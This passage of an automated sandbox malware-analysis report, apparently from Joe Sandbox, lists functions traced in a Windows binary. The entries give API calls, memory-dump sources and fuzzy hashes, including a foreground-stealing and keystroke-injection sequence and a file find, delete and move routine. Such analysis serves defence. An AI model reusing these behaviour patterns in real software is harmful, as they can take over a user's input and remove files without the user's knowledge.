                                                                                                                                                        • Instruction Fuzzy Hash: 3FD012F17902087EFB008761CD07DFB775CD722F81F4086617E06D64D1DA649E098570
                                                                                                                                                        Function 00ACE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE3AA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1777923405-0
                                                                                                                                                        • Opcode ID: a0d4655de3ee9aa7f721c34f7b4034c3f970387ed4c74348c87b61aa2db0465e
                                                                                                                                                        • Instruction ID: 94b01f0a45c0672bc3f253627714a59fe514e58f81cf26e3bf03a7b2b7cfb585
                                                                                                                                                        • Opcode Fuzzy Hash: a0d4655de3ee9aa7f721c34f7b4034c3f970387ed4c74348c87b61aa2db0465e
                                                                                                                                                        • Instruction Fuzzy Hash: 38D01231244150AAFE706B14FD06FC177929B41750F124459F5817B1E9CAD25C515544
                                                                                                                                                        Function 00AE6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: TextWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 530164218-0
                                                                                                                                                        • Opcode ID: 730fd4953ba5b24c5d959c0ad819861d414b2d2ee54483762db278338e21450a
                                                                                                                                                        • Instruction ID: 8ed5e1400f17cba5ac2d8960ca630d8522ef500d009a2ece6d69a92260b94926
                                                                                                                                                        • Opcode Fuzzy Hash: 730fd4953ba5b24c5d959c0ad819861d414b2d2ee54483762db278338e21450a
                                                                                                                                                        • Instruction Fuzzy Hash: 16D09E362106149F8B01EF99DD44D8577E9FF4D7113458451F509DB231DA21FC509B90
                                                                                                                                                        Function 00A94FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00B049DA,?,?,00000000), ref: 00A94FC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                        • Opcode ID: 8fae851a43af1894189731ddcd0761370c839894bddfca2a26cd0e296dc28db7
                                                                                                                                                        • Instruction ID: f36c5182b4d147539fdb76d7a76b09432203b12b291155e9cfd64e2500c59cc5
                                                                                                                                                        • Opcode Fuzzy Hash: 8fae851a43af1894189731ddcd0761370c839894bddfca2a26cd0e296dc28db7
                                                                                                                                                        • Instruction Fuzzy Hash: 6FD0C974640208BFEB00CB91DC46F9A7BBCEB04718F600194FA00A62D0D6F2BE408B55
                                                                                                                                                        Function 00B04DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        • Opcode ID: 4aa518a4583cb3de7a06974a29fabe9090e710858d0d9bcc927fae64cf645c1b
                                                                                                                                                        • Instruction ID: 3fb088912471f1868a72d92c7d930ad39afd2d7fb866f5ba048aae3c1697c15d
                                                                                                                                                        • Opcode Fuzzy Hash: 4aa518a4583cb3de7a06974a29fabe9090e710858d0d9bcc927fae64cf645c1b
                                                                                                                                                        • Instruction Fuzzy Hash: E9D0C7B15001009BE7205F69E404786B7E46F49300F148419F5C683551D7B698C19B11
                                                                                                                                                        Function 00A950EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00B05950), ref: 00A9510C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                        • Opcode ID: 406a87b003400ef84c8c9a2d1e7fdfcae45d1a65b914138fa90bdb556fa9796f
                                                                                                                                                        • Instruction ID: 3548a24d8384e2e3462b038c3567ece5e438ecf7b0abac0ae43040de647421b3
                                                                                                                                                        • Opcode Fuzzy Hash: 406a87b003400ef84c8c9a2d1e7fdfcae45d1a65b914138fa90bdb556fa9796f
                                                                                                                                                        • Instruction Fuzzy Hash: BAE0B675900B12DFC6328F2AE804452FBF5FFE13613218A2FD4E582660DBB0588ADB90

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00AFF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00AFF64E
                                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF6AD
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFF6EA
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF711
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFF737
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00AFF7A3
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AFF7C4
                                                                                                                                                        • GetKeyState.USER32(00000009), ref: 00AFF7D1
                                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF7E7
                                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00AFF7F1
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF820
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFF843
                                                                                                                                                        • SendMessageW.USER32(?,00001030,?,00AFDE69), ref: 00AFF940
                                                                                                                                                        • SetCapture.USER32(?), ref: 00AFF970
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFF9D4
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00AFF9FA
                                                                                                                                                        • ReleaseCapture.USER32 ref: 00AFFA05
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFFA3A
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFFA47
                                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFAA9
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFAD3
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFB12
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFB3D
                                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AFFB55
                                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AFFB60
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AFFB81
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFFB8E
                                                                                                                                                        • GetParent.USER32(?), ref: 00AFFBAA
                                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFC10
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFC40
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFFC96
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AFFCC2
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFCEA
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFFD0D
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFFD57
                                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AFFD87
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFFE1C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                                        • API String ID: 3461372671-4164748364
                                                                                                                                                        • Opcode ID: d069286501366dbc779d387892b112c8829bc06b1c62dc3934b9c362324c400a
                                                                                                                                                        • Instruction ID: 0df5e306ad6e5dbfba7058098c860b69a8b00d15fa49a666187f4d52f9ad6e91
                                                                                                                                                        • Opcode Fuzzy Hash: d069286501366dbc779d387892b112c8829bc06b1c62dc3934b9c362324c400a
                                                                                                                                                        • Instruction Fuzzy Hash: 8C329971204249AFDB60DFA8C884ABABBE5BF48358F144A69F695C72B1DB31DC04CB51
                                                                                                                                                        Function 00AFA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AFAFDB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                                                        • Opcode ID: 1b1028d65467021480dd9b7b19a1c0cafa56e0ccf0354e721943995b7f320a84
                                                                                                                                                        • Instruction ID: 609777e4d54445439488a9beb1d5ef74367312d5abc2e503c4697acf5166bbed
                                                                                                                                                        • Opcode Fuzzy Hash: 1b1028d65467021480dd9b7b19a1c0cafa56e0ccf0354e721943995b7f320a84
                                                                                                                                                        • Instruction Fuzzy Hash: 2812B0B1500218ABEB259FA8CD89FFEBBB8EF55350F108259F619DB2D1DB708941CB11
                                                                                                                                                        Function 00AAF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00AAF796
                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B04388
                                                                                                                                                        • IsIconic.USER32(000000FF), ref: 00B04391
                                                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00B0439E
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B043A8
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B043BE
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B043C5
                                                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B043D1
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043E2
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043EA
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B043F2
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B043F5
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0440A
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04415
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0441F
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04424
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0442D
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04432
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0443C
                                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00B04441
                                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00B04444
                                                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B0446B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                                        • Opcode ID: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                                                                                                                                                        • Instruction ID: 2d1a782e988c28bfca2bac885cd34e033e805112be966af278ccbb859459f280
                                                                                                                                                        • Opcode Fuzzy Hash: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                                                                                                                                                        • Instruction Fuzzy Hash: 4A3176B1A40218BFEB215B719C49FBF7EADEB44B50F518065FB05E71D1CBB05D01AAA0
                                                                                                                                                        Function 00AD6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BBC
                                                                                                                                                          • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BCF
                                                                                                                                                          • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6B9D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6BBB
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6BE2
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00AD6BF8
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD6C57
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6C6A
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6C7D
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00AD6CAB
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6CBC
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6CDB
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6CEA
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AD6CFF
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6D10
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6D37
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6D53
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6D61
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                                                        • Opcode ID: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                                                                                                                                                        • Instruction ID: 59aa6018f2bfab1e28abb5c3a7cb85b5e9539738d225ef7a8eb3a38953775abc
                                                                                                                                                        • Opcode Fuzzy Hash: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                                                                                                                                                        • Instruction Fuzzy Hash: C9512E7290416CAACF21EBA0DD84EEE77BDAF09300F4445D7E55AA3141EB349B88CF61
                                                                                                                                                        Function 00AE7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
